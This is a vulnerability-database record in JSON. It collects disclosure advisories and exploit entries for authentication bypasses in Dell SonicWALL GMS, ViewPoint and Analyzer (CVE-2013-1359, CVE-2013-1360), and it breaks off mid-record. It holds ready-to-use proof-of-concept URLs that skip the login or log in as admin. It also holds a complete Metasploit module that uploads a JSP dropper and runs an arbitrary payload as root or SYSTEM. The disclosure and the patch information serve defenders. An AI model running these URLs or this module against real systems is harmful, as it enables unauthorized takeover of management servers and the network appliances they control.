00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/appliance/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1359\r\n CVSS Base Score: 10\r\n Impact: 10\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n Advisory ID: NSOADV-2013-001\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-001.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a built-in function to skip the\r\nsession check of the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a request\r\nto the UMA Interface (/appliance/) with the parameter\r\n"skipSessionCheck=1".\r\n\r\nThe attacker gains full administrative access to the interface and\r\ncould execute code with root or SYSTEM permissions, which leads to\r\na full compromisation of the system.\r\n\r\n\r\n\r\nProof of Concept:\r\n=================\r\n\r\nhttp://host/appliance/applianceMainPage?action=status&skipSessionCheck=1\r\n\r\nThe remote Root/System exploit is attached.\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-01-21T00:00:00", "title": "NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28968", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28968", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:51", "description": "", "published": "2013-01-18T00:00:00", "type": "packetstorm", "title": "DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "PACKETSTORM:119639", "href": "https://packetstormsecurity.com/files/119639/DELL-SonicWALL-GMS-Viewpoint-Analyzer-Authentication-Bypass.html", "sourceData": "`______________________________________________________________________ \n-------------------------- NSOADV-2013-002 --------------------------- \n \nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) \n______________________________________________________________________ \n______________________________________________________________________ \n \n111101111 \n11111 00110 00110001111 \n111111 01 01 1 11111011111111 \n11111 0 11 01 0 11 1 1 111011001 \n11111111101 1 11 0110111 1 1111101111 \n1001 0 1 10 11 0 10 11 1111111 1 111 111001 \n111111111 0 10 1111 0 11 11 111111111 1 1101 10 \n00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 \n10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 \n0111111110 0110 1110 1 0 11101111111111111011 11100 00 \n01111 0 10 1110 1 011111 1 111111111111111111111101 01 \n01110 0 10 111110 110 0 11101111111111111111101111101 \n111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 \n111110110 10 0111110 1 0 0 1111111111111111111111111 110 \n111 11111 1 1 111 1 10011 101111111111011111111 0 1100 \n111 10 110 101011110010 11111111111111111111111 11 0011100 \n11 10 001100 0001 111111111111111111 10 11 11110 \n11110 00100 00001 10 1 1111 101010001 11111111 \n11101 0 1011 10000 00100 11100 00001101 0 \n0110 111011011 0110 10001 101 11110 \n1011 1 10 101 000001 01 00 \n1010 1 11001 1 1 101 10 \n110101011 0 101 11110 \n110000011 \n111 \n______________________________________________________________________ \n______________________________________________________________________ \n \nTitle: SonicWALL GMS/Viewpoint/Analyzer \nAuthentication Bypass (/sgms/) \nSeverity: Critical \nCVE-ID: CVE-2013-1360 \nCVSS Base Score: 9 \nImpact: 8.5 \nExploitability: 10 \nCVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C \nAdvisory ID: NSOADV-2013-002 \nFound Date: 2012-04-26 \nDate Reported: 2012-12-13 \nRelease Date: 2013-01-17 \nAuthor: Nikolas Sotiriu \nWebsite: http://sotiriu.de \nTwitter: http://twitter.com/nsoresearch \nMail: nso-research at sotiriu.de \nURL: http://sotiriu.de/adv/NSOADV-2013-002.txt \nVendor: DELL SonicWALL (http://www.sonicwall.com/) \nAffected Products: GMS \nAnalyzer \nUMA \nViewPoint \nAffected Platforms: Windows/Linux \nAffected Versions: GMS/Analyzer/UMA 7.0.x \nGMS/ViewPoint/UMA 6.0.x \nGMS/ViewPoint/UMA 5.1.x \nGMS/ViewPoint 5.0.x \nGMS/ViewPoint 4.1.x \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status: Vendor released a patch (See Solution) \nDiscovered by: Nikolas Sotiriu \n \n \n \nBackground: \n=========== \n \nThe SonicWALL\u00ae Global Management System (GMS) provides organizations, \ndistributed enterprises and service providers with a powerful and \nintuitive solution to centrally manage and rapidly deploy SonicWALL \nfirewall, anti-spam, backup and recovery, and secure remote access \nsolutions. Flexibly deployed as software, hardware, or a virtual \nappliance, SonicWALL GMS offers centralized real-time monitoring, and \ncomprehensive policy and compliance reporting. For enterprise customers, \nSonicWALL GMS streamlines security policy management and appliance \ndeployment, minimizing administration overhead. Service Providers can \nuse GMS to simplify the security management of multiple clients and \ncreate additional revenue opportunities. For added redundancy and \nscalability, GMS can be deployed in a cluster configuration. \n \n(Product description from Website) \n \n \n \nDescription: \n============ \n \nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that \nallows an unauthenticated, remote attacker to bypass the Web interface \nauthentication offered by the affected product. \n \nThe vulnerability is attributed to a broken session handling in the \nprocess of password change process of the web application. \nchanging in the web application. \n \nAn attacker may exploit this vulnerability by sending a specially \ncrafted request to the SGMS Interface (/sgms/). \n \nThe attacker gains full administrative access to the interface and \nfull control over all managed appliances, which could lead to a full \ncompromisation of the organisation. \n \n \n \nProof of Concept : \n================== \n \nAccess the following URL to login to the sgms interface: \n \nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 \n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 \n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 \n00000000001 \n \nIf the Console is not directly shown, type any password you \nwant in the change password dialog twice and hit submit to login. \n \nMaybe you need to access the following URL after this process: \n \nhttp://host/sgms/auth \n \n \n \nSolution: \n========= \n \nInstall Hotfix 125076.77. (Download from www.mysonicwall.com) \n \n \n \nDisclosure Timeline: \n==================== \n \n2012-04-26: Vulnerability found \n2012-12-12: Sent the notification and disclosure policy and asked \nfor a PGP Key (security@sonicwall.com) \n2012-12-13: Sent advisory, disclosure policy and planned disclosure \ndate (2012-12-28) to vendor \n2012-12-18: SonicWALL analyzed the finding and wishes to delay the \nrelease to the 3. calendar week 2013. \n2012-12-18: Changed release date to 2013-01-17. \n2012-12-20: Patch is published \n2013-01-17: Release of this advisory \n \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/119639/NSOADV-2013-002.txt"}, {"lastseen": "2016-12-05T22:23:04", "description": "", "cvss3": {}, "published": "2013-01-25T00:00:00", "type": "packetstorm", "title": "SonicWALL GMS 6 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2013-01-25T00:00:00", "id": "PACKETSTORM:119808", "href": "https://packetstormsecurity.com/files/119808/SonicWALL-GMS-6-Arbitrary-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a code execution flaw in SonicWALL GMS. It exploits two \nvulnerabilities in order to get its objective. An authentication bypass in the \nWeb Administration interface allows to abuse the \"appliance\" application and upload \nan arbitrary payload embedded in a JSP. The module has been tested successfully on \nSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual \nAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run \nsuccessfully while testing, shell payload have been used. \n}, \n'Author' => \n[ \n'Nikolas Sotiriu', # Vulnerability Discovery \n'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-1359'], \n[ 'OSVDB', '89347' ], \n[ 'BID', '57445' ], \n[ 'EDB', '24204' ] \n], \n'Privileged' => true, \n'Platform' => [ 'win', 'linux' ], \n'Targets' => \n[ \n[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 17 2012')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) \n], self.class) \nend \n \n \ndef on_new_session \n# on_new_session will force stdapi to load (for Linux meterpreter) \nend \n \n \ndef generate_jsp \nvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_data = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_counter = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_comb = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_exe = Rex::Text.rand_text_alpha(rand(8)+8) \n@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_proc = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8) \n \njspraw = \"<%@ page import=\\\"java.io.*\\\" %>\\n\" \njspraw << \"<%\\n\" \njspraw << \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\" \njspraw << \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\" \njspraw << \"String #{var_data} = \\\"\\\";\\n\" \n \njspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\" \njspraw << \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\" \njspraw << \"}\\n\" \n \njspraw << \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\" \njspraw << \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\" \n \njspraw << \"int #{var_numbytes} = #{var_inputstream}.available();\\n\" \njspraw << \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\" \njspraw << \"#{var_inputstream}.read(#{var_bytearray});\\n\" \njspraw << \"#{var_inputstream}.close();\\n\" \n \njspraw << \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\" \njspraw << \"for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\\n\" \njspraw << \"{\\n\" \njspraw << \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\" \njspraw << \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\" \njspraw << \"int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\\n\" \njspraw << \"#{var_comb} <<= 4;\\n\" \njspraw << \"#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\\n\" \njspraw << \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\" \njspraw << \"}\\n\" \n \njspraw << \"#{var_outputstream}.write(#{var_bytes});\\n\" \njspraw << \"#{var_outputstream}.close();\\n\" \n \njspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\" \njspraw << \"String[] #{var_fperm} = new String[3];\\n\" \njspraw << \"#{var_fperm}[0] = \\\"chmod\\\";\\n\" \njspraw << \"#{var_fperm}[1] = \\\"+x\\\";\\n\" \njspraw << \"#{var_fperm}[2] = #{var_exepath};\\n\" \njspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\" \njspraw << \"if (#{var_proc}.waitFor() == 0) {\\n\" \njspraw << \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\" \njspraw << \"}\\n\" \n# Linux and other UNICES allow removing files while they are in use... \njspraw << \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\" \njspraw << \"} else {\\n\" \n# Windows does not .. \njspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\" \njspraw << \"}\\n\" \n \njspraw << \"%>\\n\" \nreturn jspraw \nend \n \ndef get_install_path \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\", \n'method' => 'POST', \n'connection' => 'TE, close', \n'headers' => \n{ \n'TE' => \"deflate,gzip;q=0.3\", \n}, \n'vars_post' => { \n'num' => '123456', \n'action' => 'show_diagnostics', \n'task' => 'search', \n'item' => 'application_log', \n'criteria' => '*.*', \n'width' => '500' \n} \n}) \n \nif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/ \nreturn $1 \nend \n \nreturn nil \nend \n \ndef upload_file(location, filename, contents) \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\") \npost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\") \npost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\") \npost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\") \n \ndata = post_data.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\", \n'method' => 'POST', \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'headers' => \n{ \n'TE' => \"deflate,gzip;q=0.3\", \n}, \n'connection' => 'TE, close' \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn true \nelse \nreturn false \nend \nend \n \ndef check \n@peer = \"#{rhost}:#{rport}\" \n@uri = normalize_uri(target_uri.path) \n@uri << '/' if @uri[-1,1] != '/' \n \nif get_install_path.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \n@peer = \"#{rhost}:#{rport}\" \n@uri = normalize_uri(target_uri.path) \n@uri << '/' if @uri[-1,1] != '/' \n \n# Get Tomcat installation path \nprint_status(\"#{@peer} - Retrieving Tomcat installation path...\") \ninstall_path = get_install_path \n \nif install_path.nil? \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\") \nend \n \nprint_good(\"#{@peer} - Tomcat installed on #{install_path}\") \n \nif target['Platform'] == \"linux\" \n@location = \"#{install_path}webapps/appliance/\" \nelsif target['Platform'] == \"win\" \n@location = \"#{install_path}webapps\\\\appliance\\\\\" \nend \n \n \n# Upload the JSP and the raw payload \n@jsp_name = rand_text_alphanumeric(8+rand(8)) \n \njspraw = generate_jsp \n \n# Specify the payload in hex as an extra file.. \npayload_hex = payload.encoded_exe.unpack('H*')[0] \n \nprint_status(\"#{@peer} - Uploading the payload\") \n \nif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex) \nprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\") \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\") \nend \n \nprint_status(\"#{@peer} - Uploading the payload\") \n \nif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw) \nprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\") \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\") \nend \n \nprint_status(\"Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...\") \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/#{@jsp_name}.jsp\", \n'method' => 'GET' \n}) \n \nif res and res.code != 200 \nprint_warning(\"#{@peer} - Error triggering the payload\") \nend \n \nregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\") \nregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119808/sonicwall_gms_upload.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:F3B855C79359E1F0667451D37C614E49", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:1D818306CDCE9D06452355B580B07037", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:11", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:7A9FC357D019902C8221DA08FCAAE376", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:24", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 